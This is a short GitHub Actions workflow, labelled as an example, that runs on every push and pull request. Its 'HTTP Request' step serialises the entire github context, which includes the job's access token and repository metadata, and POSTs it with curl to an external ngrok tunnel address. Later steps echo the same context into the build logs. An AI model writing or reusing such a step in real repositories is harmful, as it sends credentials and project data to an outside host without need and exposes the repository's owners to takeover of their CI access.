name: Exemplo de GitHub Action

on:
  push:
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout do código
        uses: actions/checkout@v2

      - name: Setup Node.js
        uses: actions/setup-node@v2
        with:
          node-version: "14"

      - name: HTTP Request
        run: |
          curl -X POST -H "Content-Type: application/json" -d "${{ env.GITHUB_OBJECT }}" https://2dec-186-225-45-189.ngrok-free.app/log
        env:
          GITHUB_OBJECT: ${{ toJson(github) }}f

      - name: Mostrar o valor do commit
        run: echo "shablau ${{ github }}"

      - name: Criar enviroment github
        env:
          GITHUB_OBJECT: ${{ toJson(github) }}
        run: echo "O valor da env github é ${{ env.GITHUB_OBJECT }}"
